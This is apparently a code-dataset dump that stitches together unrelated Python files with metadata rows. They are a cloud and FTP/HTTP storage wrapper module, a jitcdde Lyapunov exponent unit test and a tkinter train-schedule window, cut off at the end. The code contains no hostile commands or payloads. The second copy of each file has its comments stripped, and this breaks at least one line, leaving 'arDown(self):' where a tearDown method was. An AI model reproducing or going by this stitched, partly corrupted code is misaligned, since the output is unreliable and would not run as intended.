(WrapperType.AZURE, WrapperType.AZURE): AzureBucketOperations.get_transfer_between_buckets_manager,
(WrapperType.AZURE, WrapperType.LOCAL): AzureBucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.AZURE): AzureBucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.GS, WrapperType.GS): GsBucketOperations.get_transfer_between_buckets_manager,
(WrapperType.GS, WrapperType.LOCAL): GsBucketOperations.get_download_manager,
(WrapperType.LOCAL, WrapperType.GS): GsBucketOperations.get_upload_manager,
(WrapperType.FTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.FTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager,
(WrapperType.HTTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager
}
def __init__(self, path):
self.path = path
self.items = []
self.path_separator = StorageOperations.PATH_SEPARATOR
@classmethod
def get_wrapper(cls, uri, symlinks=None):
parsed = urlparse(uri)
if not parsed.scheme or not parsed.netloc:
return LocalFileSystemWrapper(uri, symlinks)
if parsed.scheme.lower() == 'ftp' or parsed.scheme.lower() == 'ftps':
return HttpSourceWrapper(uri) if os.getenv("ftp_proxy") \
else FtpSourceWrapper(parsed.scheme, parsed.netloc, parsed.path, uri)
if parsed.scheme.lower() == 'http' or parsed.scheme.lower() == 'https':
return HttpSourceWrapper(uri)
else:
return cls.get_cloud_wrapper(uri)
@classmethod
def get_cloud_wrapper(cls, uri, versioning=False):
root_bucket, original_path, _ = DataStorage.load_from_uri(uri)
relative_path = original_path if original_path != '/' else ''
return cls.__get_storage_wrapper(root_bucket, relative_path, versioning=versioning)
@classmethod
def get_cloud_wrapper_for_bucket(cls, bucket_model, relative_path):
return cls.__get_storage_wrapper(bucket_model, relative_path, init=False)
@classmethod
def __get_storage_wrapper(cls, bucket, relative_path, *args, **kwargs):
_suppliers = {
WrapperType.S3: S3BucketWrapper.build_wrapper,
WrapperType.AZURE: AzureBucketWrapper.build_wrapper,
WrapperType.GS: GsBucketWrapper.build_wrapper,
}
if bucket.type in _suppliers:
supplier = _suppliers[bucket.type]
return supplier(bucket, relative_path, *args, **kwargs)
else:
raise RuntimeError('There is no data storage wrapper for %s storage type.' % bucket.type)
@classmethod
def get_operation_manager(cls, source_wrapper, destination_wrapper, command):
manager_types = source_wrapper.get_type(), destination_wrapper.get_type()
if manager_types in DataStorageWrapper._transfer_manager_suppliers:
supplier = DataStorageWrapper._transfer_manager_suppliers[manager_types]
return supplier(source_wrapper, destination_wrapper, command)
else:
raise RuntimeError('Transferring files between the following storage types %s -> %s is not supported.'
% manager_types)
@classmethod
def get_data_storage_item_path_info(cls, path, buckets=None):
error = None
if buckets is None or len(buckets) == 0:
buckets = []
try:
buckets = list(DataStorage.list())
except ConfigNotFoundError as config_not_found_error:
error = str(config_not_found_error)
except requests.exceptions.RequestException as http_error:
error = 'Http error: {}'.format(str(http_error))
except RuntimeError as runtime_error:
error = 'Error: {}'.format(str(runtime_error))
except ValueError as value_error:
error = 'Error: {}'.format(str(value_error))
if error:
return error, None, None, None
url = urlparse(path)
if url.scheme.lower() not in WrapperType.cloud_schemes():
return "'%s' scheme is not supported" % url.scheme, None, None, None
parts = url.path.split('/')
current_bucket = None
for bucket_model in buckets:
if bucket_model.path is not None \
and bucket_model.type in WrapperType.cloud_types() \
and path.startswith(bucket_model.path.lower()):
if current_bucket is None or len(bucket_model.path) > len(current_bucket.path):
current_bucket = bucket_model
break
if current_bucket is None:
return 'Storage \'{}\' was not found'.format(path), None, None, None
delimiter = '/'
if current_bucket.delimiter is not None:
delimiter = current_bucket.delimiter
relative_path = url.path
item_type = FILE
if len(parts[len(parts) - 1].split('.')) == 1:
item_type = FOLDER
return None, current_bucket.identifier, relative_path, item_type, delimiter
def get_type(self):
return None
def is_file(self):
return False
def exists(self):
return False
def is_empty(self, relative=None):
return False
def is_local(self):
return self.get_type() == WrapperType.LOCAL
def fetch_items(self):
self.items = self.get_items()
def get_items(self):
return []
def get_folders_list(self):
return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FOLDER])
def get_files_list(self):
return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FILE])
def create_folder(self, relative_path):
pass
def download_file(self, source_uri, relative_path):
pass
def download_single_file(self, source_uri, relative_path):
pass
def get_file_download_uri(self, relative_path):
return None
def delete_item(self, relative_path):
pass
def path_with_trailing_separator(self):
return self.path \
if self.path.endswith(self.path_separator) \
else self.path + self.path_separator
class CloudDataStorageWrapper(DataStorageWrapper):
__metaclass__ = ABCMeta
def __init__(self, bucket, path):
super(CloudDataStorageWrapper, self).__init__(path)
self.bucket = bucket
self.is_file_flag = False
self.exists_flag = False
if len(path) == 0 and self.bucket.identifier:
self.exists_flag = True
self.is_file_flag = False
def is_file(self):
return self.is_file_flag
def exists(self):
return self.exists_flag
def get_items(self):
return self.get_list_manager().get_items(self.path)
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if relative:
delimiter = StorageOperations.PATH_SEPARATOR
path = self.path.rstrip(delimiter) + delimiter + relative
else:
path = self.path
return not self.get_list_manager().folder_exists(path)
@abstractmethod
def get_type(self):
pass
@abstractmethod
def get_restore_manager(self):
pass
@abstractmethod
def get_list_manager(self, show_versions=False):
pass
@abstractmethod
def get_delete_manager(self, versioning):
pass
class S3BucketWrapper(CloudDataStorageWrapper):
def __init__(self, bucket, path):
super(S3BucketWrapper, self).__init__(bucket, path)
self.bucket.path = bucket.path.split(self.path_separator)[0]
self.is_empty_flag = True
self.session = None
@classmethod
def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
wrapper = S3BucketWrapper(root_bucket, relative_path)
if init:
S3BucketOperations.init_wrapper(wrapper, *args, **kwargs)
return wrapper
def get_type(self):
return WrapperType.S3
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if not self.is_empty_flag and relative:
return not S3BucketOperations.path_exists(self, relative, session=self.session)
return self.is_empty_flag
def get_file_download_uri(self, relative_path):
download_url_model = DataStorage.generate_download_url(self.bucket.identifier, relative_path)
if download_url_model is not None:
return download_url_model.url
return None
def delete_item(self, relative_path):
S3BucketOperations.delete_item(self, relative_path, session=self.session)
def get_restore_manager(self):
return S3BucketOperations.get_restore_manager(self)
def get_list_manager(self, show_versions=False):
return S3BucketOperations.get_list_manager(self, show_versions=show_versions)
def get_delete_manager(self, versioning):
return S3BucketOperations.get_delete_manager(self, versioning)
class AzureBucketWrapper(CloudDataStorageWrapper):
def __init__(self, bucket, path):
super(AzureBucketWrapper, self).__init__(bucket, path)
self.service = None
@classmethod
def build_wrapper(cls, root_bucket, relative_path, versioning=False, init=True):
if versioning:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
wrapper = AzureBucketWrapper(root_bucket, relative_path)
if init:
StorageOperations.init_wrapper(wrapper, versioning=versioning)
return wrapper
def get_type(self):
return WrapperType.AZURE
def get_restore_manager(self):
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
def get_list_manager(self, show_versions=False):
if show_versions:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
return AzureListingManager(self._blob_service(read=True, write=False), self.bucket)
def get_delete_manager(self, versioning):
if versioning:
raise RuntimeError('Versioning is not supported by AZURE cloud provider')
return AzureDeleteManager(self._blob_service(read=True, write=True), self.bucket)
def _blob_service(self, read, write):
if write or not self.service:
self.service = AzureBucketOperations.get_blob_service(self.bucket, read, write)
return self.service
class GsBucketWrapper(CloudDataStorageWrapper):
@classmethod
def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
wrapper = GsBucketWrapper(root_bucket, relative_path)
if init:
StorageOperations.init_wrapper(wrapper, *args, **kwargs)
return wrapper
def get_type(self):
return WrapperType.GS
def get_restore_manager(self):
return GsRestoreManager(self._storage_client(write=True, versioning=True), self)
def get_list_manager(self, show_versions=False):
return GsListingManager(self._storage_client(versioning=show_versions), self.bucket, show_versions)
def get_delete_manager(self, versioning):
return GsDeleteManager(self._storage_client(write=True, versioning=versioning), self.bucket)
def _storage_client(self, read=True, write=False, versioning=False):
return GsBucketOperations.get_client(self.bucket, read=read, write=write, versioning=versioning)
class LocalFileSystemWrapper(DataStorageWrapper):
def __init__(self, path, symlinks=None):
super(LocalFileSystemWrapper, self).__init__(path)
if self.path == ".":
self.path = "./"
if self.path.startswith("~"):
self.path = os.path.join(os.path.expanduser('~'), self.path.strip("~/"))
self.symlinks = symlinks
self.path_separator = os.sep
def exists(self):
return os.path.exists(self.path)
def is_file(self):
return os.path.isfile(self.path)
def get_type(self):
return WrapperType.LOCAL
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if relative:
return not os.path.exists(os.path.join(self.path, relative))
return not os.listdir(self.path)
def get_items(self):
def leaf_path(source_path):
head, tail = os.path.split(source_path)
return tail or os.path.basename(head)
self.path = os.path.abspath(self.path)
if os.path.isfile(self.path):
if os.path.islink(self.path) and self.symlinks == AllowedSymlinkValues.SKIP:
return []
return [(FILE, self.path, leaf_path(self.path), os.path.getsize(self.path))]
else:
result = list()
visited_symlinks = set()
def list_items(path, parent, symlinks, visited_symlinks, root=False):
for item in os.listdir(path):
absolute_path = os.path.join(path, item)
symlink_target = None
if os.path.islink(absolute_path) and symlinks != AllowedSymlinkValues.FOLLOW:
if symlinks == AllowedSymlinkValues.SKIP:
continue
if symlinks == AllowedSymlinkValues.FILTER:
symlink_target = os.readlink(absolute_path)
if symlink_target in visited_symlinks:
continue
else:
visited_symlinks.add(symlink_target)
relative_path = item
if not root and parent is not None:
relative_path = os.path.join(parent, item)
if os.path.isfile(absolute_path):
result.append((FILE, absolute_path, relative_path, os.path.getsize(absolute_path)))
elif os.path.isdir(absolute_path):
list_items(absolute_path, relative_path, symlinks, visited_symlinks)
if symlink_target and os.path.islink(path) and symlink_target in visited_symlinks:
visited_symlinks.remove(symlink_target)
list_items(self.path, leaf_path(self.path), self.symlinks, visited_symlinks, root=True)
return result
def create_folder(self, relative_path):
absolute_path = os.path.join(self.path, relative_path)
if os.path.isfile(absolute_path):
return 'Error creating folder {}: a file with the same name already exists'.format(relative_path)
if not os.path.isdir(absolute_path):
os.makedirs(absolute_path)
return None
def download_single_file(self, source_uri, relative_path):
if source_uri is None:
click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
sys.exit(1)
folder, file_name = os.path.split(self.path)
file_name = file_name or relative_path
full_path = os.path.join(folder, file_name)
if not os.path.isdir(folder):
os.makedirs(folder)
if os.path.isdir(full_path):
click.echo('Error copying file to \'{}\': a directory with the same name already exists'.format(full_path),
err=True)
sys.exit(1)
r = requests.get(source_uri, stream=True)
content_length = None
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if content_length is None:
click.echo('{}...'.format(relative_path), nl=False)
with open(full_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
click.echo('done.')
else:
estimated_bytes = content_length
click.echo('{}:'.format(relative_path))
with click.progressbar(length=content_length,
show_eta=False,
label=relative_path,
bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
with open(full_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
if len(chunk) > 0:
estimated_bytes -= len(chunk)
progress_bar.update(len(chunk))
progress_bar.update(estimated_bytes)
pass
def download_file(self, source_uri, relative_path):
if source_uri is None:
click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
sys.exit(1)
r = requests.get(source_uri, stream=True)
content_length = None
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if content_length is None:
click.echo('{}...'.format(relative_path), nl=False)
with open(os.path.join(self.path, relative_path), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
click.echo('done.')
else:
estimated_bytes = content_length
with click.progressbar(length=content_length,
show_eta=False,
label=relative_path,
bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
with open(os.path.join(self.path, relative_path), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
if len(chunk) > 0:
estimated_bytes -= len(chunk)
progress_bar.update(len(chunk))
progress_bar.update(estimated_bytes)
def delete_item(self, relative_path):
path = os.path.join(self.path, relative_path)
if os.path.isfile(path) and os.path.exists(path):
os.remove(path)
else:
shutil.rmtree(path, ignore_errors=True)
class FtpSourceWrapper(DataStorageWrapper):
def __init__(self, scheme, netloc, relative_path, url):
super(FtpSourceWrapper, self).__init__(url)
self.is_file_flag = False
self.exists_flag = False
self.relative_path = relative_path
self.host = netloc
self.scheme = scheme
self.ftp = FTP(netloc)
self.ftp.login()
def get_type(self):
return WrapperType.FTP
def exists(self):
try:
self.ftp.nlst(self.relative_path)
self.exists_flag = True
return True
except error_temp:
self.exists_flag = False
return False
def is_file(self):
self.is_file_flag = len(self.ftp.nlst(self.relative_path)) == 1
return self.is_file_flag
def get_items(self):
return self._get_files([], self.relative_path)
def _get_files(self, files, path):
remote_files = self.ftp.nlst(path)
if len(remote_files) == 1:
self.ftp.voidcmd('TYPE I')
files.append((FILE, "%s://%s%s" % (self.scheme, self.host, path),
self._get_relative_path(path).strip("/"), self.ftp.size(path)))
else:
for file_path in remote_files:
self._get_files(files, file_path)
return files
def _get_relative_path(self, path):
if self.relative_path == path:
return os.path.basename(path)
else:
return path[len(self.relative_path):]
class HttpSourceWrapper(DataStorageWrapper):
def __init__(self, url):
super(HttpSourceWrapper, self).__init__(url)
self.host = urlparse(url).netloc
self.is_file_flag = False
self.exists_flag = False
self.ftp_proxy_session = None
if os.getenv("ftp_proxy"):
self.ftp_proxy_session = requests.Session()
self.ftp_proxy_session.mount('ftp://', requests.adapters.HTTPAdapter())
def get_type(self):
return WrapperType.HTTP
def exists(self):
head = self._head(self.path)
self.exists_flag = head.status_code == 200
return self.exists_flag
def is_file(self):
self.is_file_flag = self._is_downloadable()
return self.is_file_flag
def get_items(self):
return self._get_files(self.path, [], [])
def _head(self, path):
return self.ftp_proxy_session.head(path) if self.ftp_proxy_session \
else requests.head(path, allow_redirects=True)
def _get(self, path):
return self.ftp_proxy_session.get(path) if self.ftp_proxy_session else requests.get(path)
def _is_downloadable(self):
head = self._head(self.path)
header = head.headers
content_type = header.get('content-type')
return content_type is None or 'html' not in content_type.lower()
def _get_files(self, path, files, processed_paths):
if path in processed_paths:
return files
processed_paths.append(path)
if self._is_downloadable():
head = self._head(path)
content_length = head.headers.get('Content-Length')
files.append((FILE, str(path), self._get_relative_path(path).strip("/"),
content_length if content_length is None else int(content_length)))
else:
response = self._get(path)
soup = BeautifulSoup(response.content, "html.parser", parse_only=SoupStrainer('a'))
page_paths = set([link['href'] for link in soup.findAll('a', href=True)])
for page_path in page_paths:
current_host = urlparse(page_path).netloc
if current_host:
if page_path in processed_paths:
continue
if current_host != self.host:
processed_paths.append(page_path)
continue
head = self._head(page_path)
if head.status_code == 200:
self._get_files(page_path, files, processed_paths)
else:
parsed = urlparse(path)
normalized_path = "%s://%s%s" % (parsed.scheme, parsed.netloc,
posixpath.normpath(os.path.join(parsed.path, page_path)))
if normalized_path in processed_paths:
continue
if not normalized_path.startswith(self.path):
processed_paths.append(normalized_path)
continue
head = self._head(normalized_path)
if head.status_code == 200:
self._get_files(normalized_path, files, processed_paths)
else:
processed_paths.append(normalized_path)
return files
def _get_relative_path(self, path):
if self.path == path:
return os.path.basename(path)
else:
return path[len(self.path):]
| true | true |
1c2c9c7a1cf5617662b1acb6b67cef04aa34ecdd | 2,839 | py | Python | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 49 | 2016-10-24T10:00:33.000Z | 2022-03-27T11:03:51.000Z | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 45 | 2016-11-20T22:05:07.000Z | 2022-03-29T07:13:25.000Z | tests/test_lyaps.py | neurophysik/jitcdde | 44d7ed6ad187d3591407155b6eeb063f73e462cd | [
"BSD-3-Clause"
] | 11 | 2016-11-14T07:19:16.000Z | 2022-03-16T14:27:06.000Z | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import platform
import unittest
import numpy as np
from scipy.stats import sem
from jitcdde import t, y, jitcdde_lyap
if platform.system() == "Windows":
compile_args = None
else:
from jitcxde_common import DEFAULT_COMPILE_ARGS
compile_args = DEFAULT_COMPILE_ARGS+["-g","-UNDEBUG"]
omega = np.array([0.88167179, 0.87768425])
delay = 4.5
f = [
omega[0] * (-y(1) - y(2)),
omega[0] * (y(0) + 0.165 * y(1)),
omega[0] * (0.2 + y(2) * (y(0) - 10.0)),
omega[1] * (-y(4) - y(5)) + 0.25 * (y(0,t-delay) - y(3)),
omega[1] * (y(3) + 0.165 * y(4)),
omega[1] * (0.2 + y(5) * (y(3) - 10.0))
]
test_parameters = {
"rtol": 1e-7,
"atol": 1e-7,
"pws_rtol": 1e-3,
"pws_atol": 1e-3,
"first_step": 30,
"max_step": 100,
"min_step": 1e-30,
}
lyap_controls = [0.0806, 0, -0.0368, -0.1184]
class TestIntegration(unittest.TestCase):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
def test_integrate_blindly(self):
self.DDE.integrate_blindly(100.0, 0.1)
def test_step_on_discontinuities(self):
self.DDE.step_on_discontinuities()
## Takes forever:
# def test_Python_core(self):
# self.DDE.generate_lambdas(simplify=False)
# self.DDE.step_on_discontinuities(max_step=0.1)
def tearDown(self):
lyaps = []
weights = []
for T in np.arange(self.DDE.t, self.DDE.t+1000, 10):
_, lyap, weight = self.DDE.integrate(T)
lyaps.append(lyap)
weights.append(weight)
lyaps = np.vstack(lyaps)
lyap_start = 40
for i,lyap_control in enumerate(lyap_controls):
lyap = np.average(lyaps[lyap_start:,i], weights=weights[lyap_start:])
stderr = sem(lyaps[lyap_start:,i])
self.assertAlmostEqual(lyap_control, lyap, delta=3*stderr)
class TestSaveAndLoad(TestIntegration):
def setUp(self):
DDE_orig = jitcdde_lyap(f, n_lyap=len(lyap_controls))
filename = DDE_orig.save_compiled(overwrite=True)
self.DDE = jitcdde_lyap(
n=6,
module_location=filename,
delays=[delay],
n_lyap=len(lyap_controls)
)
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
class TestOMP(TestIntegration):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
self.DDE.compile_C(omp=True,chunk_size=15)
if __name__ == "__main__":
unittest.main(buffer=True)
| 28.676768 | 75 | 0.695315 |
import platform
import unittest
import numpy as np
from scipy.stats import sem
from jitcdde import t, y, jitcdde_lyap
if platform.system() == "Windows":
compile_args = None
else:
from jitcxde_common import DEFAULT_COMPILE_ARGS
compile_args = DEFAULT_COMPILE_ARGS+["-g","-UNDEBUG"]
omega = np.array([0.88167179, 0.87768425])
delay = 4.5
f = [
omega[0] * (-y(1) - y(2)),
omega[0] * (y(0) + 0.165 * y(1)),
omega[0] * (0.2 + y(2) * (y(0) - 10.0)),
omega[1] * (-y(4) - y(5)) + 0.25 * (y(0,t-delay) - y(3)),
omega[1] * (y(3) + 0.165 * y(4)),
omega[1] * (0.2 + y(5) * (y(3) - 10.0))
]
test_parameters = {
"rtol": 1e-7,
"atol": 1e-7,
"pws_rtol": 1e-3,
"pws_atol": 1e-3,
"first_step": 30,
"max_step": 100,
"min_step": 1e-30,
}
lyap_controls = [0.0806, 0, -0.0368, -0.1184]
class TestIntegration(unittest.TestCase):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
def test_integrate_blindly(self):
self.DDE.integrate_blindly(100.0, 0.1)
def test_step_on_discontinuities(self):
self.DDE.step_on_discontinuities()
arDown(self):
lyaps = []
weights = []
for T in np.arange(self.DDE.t, self.DDE.t+1000, 10):
_, lyap, weight = self.DDE.integrate(T)
lyaps.append(lyap)
weights.append(weight)
lyaps = np.vstack(lyaps)
lyap_start = 40
for i,lyap_control in enumerate(lyap_controls):
lyap = np.average(lyaps[lyap_start:,i], weights=weights[lyap_start:])
stderr = sem(lyaps[lyap_start:,i])
self.assertAlmostEqual(lyap_control, lyap, delta=3*stderr)
class TestSaveAndLoad(TestIntegration):
def setUp(self):
DDE_orig = jitcdde_lyap(f, n_lyap=len(lyap_controls))
filename = DDE_orig.save_compiled(overwrite=True)
self.DDE = jitcdde_lyap(
n=6,
module_location=filename,
delays=[delay],
n_lyap=len(lyap_controls)
)
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
class TestOMP(TestIntegration):
def setUp(self):
self.DDE = jitcdde_lyap(f, n_lyap=len(lyap_controls))
self.DDE.add_past_point(-delay, np.random.random(6), np.random.random(6))
self.DDE.add_past_point(0.0, np.random.random(6), np.random.random(6))
self.DDE.set_integration_parameters(**test_parameters)
self.DDE.compile_C(omp=True,chunk_size=15)
if __name__ == "__main__":
unittest.main(buffer=True)
| true | true |
1c2c9d6642125c20bd9273e257de3b216516ac79 | 5,707 | py | Python | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | 19 | 2021-11-05T22:54:09.000Z | 2022-03-29T15:03:47.000Z | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | null | null | null | ch15/train-project/train_schedule/views/main.py | kxen42/Learn-Python-Programming-Third-Edition | 851ddc5e6094fadd44f31a9ad1d3876456b04372 | [
"MIT"
] | 26 | 2021-11-12T17:04:50.000Z | 2022-03-29T01:10:35.000Z | # train-project/train_schedule/views/main.py
import tkinter as tk
from contextlib import contextmanager
from tkinter import messagebox, ttk
from .. import APP_TITLE
from ..resources import load_binary_resource
from .stations import StationChooser
from .trains import TrainsView
ICON_FILENAME = "icon.png"
@contextmanager
def show_error():
"""A simple context manager to catch any exceptions and
display them as error messages in an error dialog"""
try:
yield
except Exception as error:
messagebox.showerror(title="Error", message=error)
class MainWindow:
"""The main window for our app"""
def __init__(self):
self.root = tk.Tk()
self._set_title()
self._set_icon()
self._make_menus()
content_frame = self._make_content()
self._layout_widgets(content_frame)
def _set_title(self):
"""Set the window title"""
self.title = APP_TITLE
self.root.title(self.title)
self.root.iconname(self.title)
def _set_icon(self):
"""Set the window icon"""
self.icon = tk.PhotoImage(
data=load_binary_resource(ICON_FILENAME)
)
self.root.iconphoto(True, self.icon)
def _make_menus(self):
"""Create the menubar"""
self.root.option_add("*tearOff", False)
self.menubar = tk.Menu(self.root)
self._make_app_menu()
self._make_edit_menu()
self._make_help_menu()
self.root["menu"] = self.menubar
def _make_app_menu(self):
"""Create the main application menu"""
app_menu = tk.Menu(self.menubar)
app_menu.add_command(
label="Refresh",
command=lambda: self.root.event_generate(
"<<RefreshData>>"
),
underline=0,
)
app_menu.add_command(
label="Quit",
command=self.quit,
underline=0,
)
self.menubar.add_cascade(
menu=app_menu, label=self.title, underline=0
)
def _make_edit_menu(self):
"""Create the 'Edit' menu"""
edit_menu = tk.Menu(self.menubar)
edit_menu.add_command(
label="Preferences...",
command=lambda: self.root.event_generate(
"<<OpenPreferencesDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=edit_menu, label="Edit", underline=0
)
def _make_help_menu(self):
"""Create the 'Help' menu"""
help_menu = tk.Menu(self.menubar)
help_menu.add_command(
label="About...",
command=lambda: self.root.event_generate(
"<<OpenAboutDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=help_menu, label="Help", underline=0
)
def _make_content(self):
"""Create the widgets to populate the body of the
window"""
content_frame = ttk.Frame(self.root, padding=(5, 5, 5, 5))
station_frame = self._make_station_chooser(content_frame)
station_frame.grid(row=0, column=0, sticky=tk.NSEW)
notebook = ttk.Notebook(
content_frame, padding=(0, 5, 0, 0)
)
self.arrivals_view = self._make_train_tab(
notebook, "Arrivals", show_from=True, show_to=False
)
self.departures_view = self._make_train_tab(
notebook, "Departures", show_from=False, show_to=True
)
notebook.grid(row=1, column=0, sticky=tk.NSEW)
content_frame.rowconfigure(1, weight=1)
content_frame.columnconfigure(0, weight=1)
return content_frame
def _make_station_chooser(self, content_frame):
"""Create the station chooser dropdown"""
station_frame = ttk.LabelFrame(
content_frame, text="Station", padding=(5, 5, 5, 5)
)
self.station_chooser = StationChooser(station_frame)
self.station_chooser.combobox.grid(
row=0, column=0, sticky=tk.NSEW
)
station_frame.columnconfigure(0, weight=1)
return station_frame
def _make_train_tab(self, notebook, name, show_from, show_to):
"""Create the widgets to display either arrivals or
departures"""
frame = ttk.Frame(notebook, padding=(5, 5, 5, 5))
notebook.add(frame, text=name)
train_view = TrainsView(
frame, show_from=show_from, show_to=show_to
)
scrollbar = ttk.Scrollbar(
frame,
orient=tk.VERTICAL,
command=train_view.treeview.yview,
)
train_view.treeview.configure(
yscrollcommand=scrollbar.set
)
train_view.treeview.grid(row=0, column=0, sticky=tk.NSEW)
scrollbar.grid(row=0, column=1, sticky=tk.NS)
frame.rowconfigure(0, weight=1)
frame.columnconfigure(0, weight=1)
return train_view
def _layout_widgets(self, content_frame):
"""Lay out the main frame of the window"""
content_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.root.rowconfigure(0, weight=1)
self.root.columnconfigure(0, weight=1)
def bind(self, *args, **kwargs):
"""Proxy for the underlying window's bind method"""
self.root.bind(*args, *kwargs)
def unbind(self, *args, **kwargs):
"""Proxy for the underlying window's unbind method"""
self.root.unbind(*args, *kwargs)
def run(self):
"""Run the main loop"""
self.root.mainloop()
def quit(self, event=None):
"""Destroy the window and quit the app"""
self.root.destroy()
| 29.569948 | 66 | 0.599439 |
import tkinter as tk
from contextlib import contextmanager
from tkinter import messagebox, ttk
from .. import APP_TITLE
from ..resources import load_binary_resource
from .stations import StationChooser
from .trains import TrainsView
ICON_FILENAME = "icon.png"
@contextmanager
def show_error():
try:
yield
except Exception as error:
messagebox.showerror(title="Error", message=error)
class MainWindow:
def __init__(self):
self.root = tk.Tk()
self._set_title()
self._set_icon()
self._make_menus()
content_frame = self._make_content()
self._layout_widgets(content_frame)
def _set_title(self):
self.title = APP_TITLE
self.root.title(self.title)
self.root.iconname(self.title)
def _set_icon(self):
self.icon = tk.PhotoImage(
data=load_binary_resource(ICON_FILENAME)
)
self.root.iconphoto(True, self.icon)
def _make_menus(self):
self.root.option_add("*tearOff", False)
self.menubar = tk.Menu(self.root)
self._make_app_menu()
self._make_edit_menu()
self._make_help_menu()
self.root["menu"] = self.menubar
def _make_app_menu(self):
app_menu = tk.Menu(self.menubar)
app_menu.add_command(
label="Refresh",
command=lambda: self.root.event_generate(
"<<RefreshData>>"
),
underline=0,
)
app_menu.add_command(
label="Quit",
command=self.quit,
underline=0,
)
self.menubar.add_cascade(
menu=app_menu, label=self.title, underline=0
)
def _make_edit_menu(self):
edit_menu = tk.Menu(self.menubar)
edit_menu.add_command(
label="Preferences...",
command=lambda: self.root.event_generate(
"<<OpenPreferencesDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=edit_menu, label="Edit", underline=0
)
def _make_help_menu(self):
help_menu = tk.Menu(self.menubar)
help_menu.add_command(
label="About...",
command=lambda: self.root.event_generate(
"<<OpenAboutDialog>>"
),
underline=0,
)
self.menubar.add_cascade(
menu=help_menu, label="Help", underline=0
)
def _make_content(self):
content_frame = ttk.Frame(self.root, padding=(5, 5, 5, 5))
station_frame = self._make_station_chooser(content_frame)
station_frame.grid(row=0, column=0, sticky=tk.NSEW)
notebook = ttk.Notebook(
content_frame, padding=(0, 5, 0, 0)
)
self.arrivals_view = self._make_train_tab(
notebook, "Arrivals", show_from=True, show_to=False
)
self.departures_view = self._make_train_tab(
notebook, "Departures", show_from=False, show_to=True
)
notebook.grid(row=1, column=0, sticky=tk.NSEW)
content_frame.rowconfigure(1, weight=1)
content_frame.columnconfigure(0, weight=1)
return content_frame
def _make_station_chooser(self, content_frame):
station_frame = ttk.LabelFrame(
content_frame, text="Station", padding=(5, 5, 5, 5)
)
self.station_chooser = StationChooser(station_frame)
self.station_chooser.combobox.grid(
row=0, column=0, sticky=tk.NSEW
)
station_frame.columnconfigure(0, weight=1)
return station_frame
def _make_train_tab(self, notebook, name, show_from, show_to):
frame = ttk.Frame(notebook, padding=(5, 5, 5, 5))
notebook.add(frame, text=name)
train_view = TrainsView(
frame, show_from=show_from, show_to=show_to
)
scrollbar = ttk.Scrollbar(
frame,
orient=tk.VERTICAL,
command=train_view.treeview.yview,
)
train_view.treeview.configure(
yscrollcommand=scrollbar.set
)
